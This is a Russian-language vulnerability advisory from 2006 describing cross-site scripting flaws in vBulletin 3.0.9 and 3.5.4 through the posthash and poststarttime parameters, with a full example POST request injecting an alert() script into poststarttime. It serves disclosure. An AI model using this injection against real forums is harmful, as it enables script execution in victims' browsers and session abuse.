Межсайтовый скриптинг в vBulletin

Дата публикации:
25.04.2006
Дата изменения:
06.04.2009
Всего просмотров:
5612
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
vBulletin 3.x
Уязвимые версии:
vBulletin 3.0.9, возможно более ранние версии. vBulletin 3.5.4, возможно более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.

1. Уязвимость существует из-за недостаточной обработки входных данных в параметрах posthash и poststarttime в сценариях newreply.php и newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Уязвимость обнаружена в версии vBulletin 3.0.9.

2. Уязвимость существует из-за недостаточной обработки входных данных в параметре posthash в сценарии newthread.php. Удаленный пользователь может с помощью специально сформированного POST запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Уязвимость обнаружена в версии vBulletin 3.5.4. Пример:

POST /forum/newthread.php HTTP/1.0
Cookie: bbpda=1;
bbthread_rate=1c6bfc06f109abf5078b2045c33e55a4ax1x-ix1yix5y_;
bbcalview1=displaymonth; bbcalmonth=4; bbcalyear=2006;
bbthread_lastview=394ad39f3930b09d1831a211b105b2d6ax1x-ix1ysx10x%221133126055%22y_;
bbforum_view=888e1d7caeee8543b71b0312be1553edax2x-ix1yix1144526895yix3yix1144526913y_;
bbpassword=a7aaf4a00945981be9f73671700f4027; bblastvisit=1144526894;
bbsessionhash=ba9575585221066d61a0c88baa3fba4c; bbuserid=1
Content-Length: 312
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Host: www.vulnerable.ru
Content-Type: application/x-www-form-urlencoded
Referer: http://www.vulnerable.ru/forum/newthread.php?do=newthread&f=3

subject=1234&WYSIWYG_HTML=%3Cp%3E%3C%2Fp%3E&s=&f=3&do=postthread&posthash=c8
d3fe38b082b6d3381cbee17f1f1aca&
poststarttime='%2Balert('Shanker')%2B'&sbutton=%D1%EE%E7%E4%E0%F2%FC+%ED%EE%
E2%F3%FE+%F2%E5%EC%F3&parseurl=1&
disablesmilies=1&emailupdate=3&postpoll=yes&polloptions=1234&openclose=1&sti
ckunstick=1&iconid=0

URL производителя: www.vbulletin.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Об уязвимости сообщил Агиевич Игорь aka Shanker (shanker@mail.ru)

или введите имя

CAPTCHA